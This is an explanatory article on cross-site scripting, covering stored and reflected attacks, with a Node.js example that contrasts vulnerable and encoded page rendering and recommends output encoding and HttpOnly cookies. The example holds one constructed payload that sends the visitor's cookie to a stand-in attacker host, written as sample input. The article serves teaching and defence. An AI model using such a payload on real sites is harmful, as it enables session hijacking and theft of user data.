What is Cross-Site Scripting?


Cross-site scripting (XSS) is a method of injecting script into a web page or HTML-formatted email so that it runs in another user's browser, with that site's privileges, in order to gain access to the user's data.

How Cross-Site Scripting works

The goal of XSS is to obtain user information associated with the web site, such as the username and password, and any additional information such as billing details. XSS is also used for cookie stealing, changing user settings and account hijacking.

It works by relying on a web site having an XSS vulnerability: somewhere the site places visitor-supplied input into a page without encoding it. The attacker either stores the injected script on the site itself (a forum post or a profile field, for example) so that it runs for everyone who views that page, or puts it in a crafted link on another web site or in an email. When a user who is logged in to the target site, Facebook for instance, clicks the link, the script runs in their browser with access to their session.

Web sites that offer a way for visitors to enter data should treat what is entered as text, never as code: any input that ends up in a page must be encoded for the place it lands (HTML text, an attribute value, a script block, a URL) so that the browser cannot interpret it as markup or script. Letting it through unencoded is a form of code injection.

As a basic example, a web site that lets you enter text to be posted on its pages should make sure that what you entered is rendered as text and not as web code; otherwise the pages it generates could be sending your information, or that of every other visitor, to a third party.
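The following is an added example, not code from the original article, showing both cases described above in Node.js: a comment page that stores visitor text (stored XSS) and a search page that echoes a query parameter back from a link (reflected XSS), each in a vulnerable form and a form that encodes the input before writing it into the page. The hostnames attacker.example and shop.example and the payload are constructed placeholders.

```javascript
// Added example (not from the original article): how a page that echoes
// visitor input becomes an XSS vector, and how output encoding stops it.
// Node.js, standard library only. All inputs below are constructed samples.

// Encode the five characters that can change meaning inside HTML text or a
// double-quoted attribute value. The browser renders "&lt;script&gt;" as the
// literal text <script>; it never parses it as a tag.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the visitor's text is concatenated straight into the page.
function renderCommentVulnerable(author, text) {
  return `<div class="comment"><b>${author}</b>: ${text}</div>`;
}

// Hardened: every untrusted value is encoded for the HTML text context it lands in.
function renderCommentSafe(author, text) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</div>`;
}

// Reflected variant: a search page that echoes the query back into the page.
function renderSearchVulnerable(query) {
  return `<p>Results for <i>${query}</i></p>`;
}
function renderSearchSafe(query) {
  return `<p>Results for <i>${escapeHtml(query)}</i></p>`;
}

// Crude check used only to show the difference: does the output contain a raw
// <script> tag? A real browser's HTML parser is the final judge, but this is
// enough to see the encoding take effect.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample payload of the kind the article describes: script that
// sends the visitor's cookie (their session) to a third party.
const payload = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
const author = 'mallory';

// Stored XSS: the comment is saved once and served to every later visitor.
const storedBad = renderCommentVulnerable(author, payload);
const storedGood = renderCommentSafe(author, payload);

// Reflected XSS: the payload arrives in a link such as
//   https://shop.example/search?q=<script>...</script>
// that the victim clicks while logged in; the server reads q and echoes it.
const url = new URL('https://shop.example/search?q=' + encodeURIComponent(payload));
const q = url.searchParams.get('q');
const reflectedBad = renderSearchVulnerable(q);
const reflectedGood = renderSearchSafe(q);

console.log('stored, vulnerable:  ', storedBad);
console.log('stored, encoded:     ', storedGood);
console.log('reflected, vulnerable:', reflectedBad);
console.log('reflected, encoded:   ', reflectedGood);
```

Note that escapeHtml is only correct for the HTML text and quoted-attribute contexts used here; a value written into a JavaScript string, an unquoted attribute, a URL or a CSS rule needs encoding for that context instead, which is why templating engines that auto-escape per context are preferable to hand-rolled concatenation.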

XSS has been around for many years and has grown to encompass attacks using all sorts of web page objects such as Flash, Java, JavaScript, VBScript and ActiveX.

Last word

Web sites that offer their visitors the ability to input data that then forms part of a public web page, such as a web forum, should be checking that what is entered is not web code, and encoding it before it is written into the page.

A cross-site script in its simplest form is code injected into a web site for the purpose of allowing a third party to access or interact with another person's web session.

As a user you can reduce your exposure by adding script controls to your web browser, such as NoScript for Firefox, but that only limits which sites may run script at all. The real defence lies with the web site: encode everything it echoes back into its pages, and mark session cookies HttpOnly so that injected script cannot read them.

If you have any feedback regarding this article, or you have a suggestion for a new article, or just want to say thanks for the info then feel free to drop me an email at

Article date: 25th February 2011
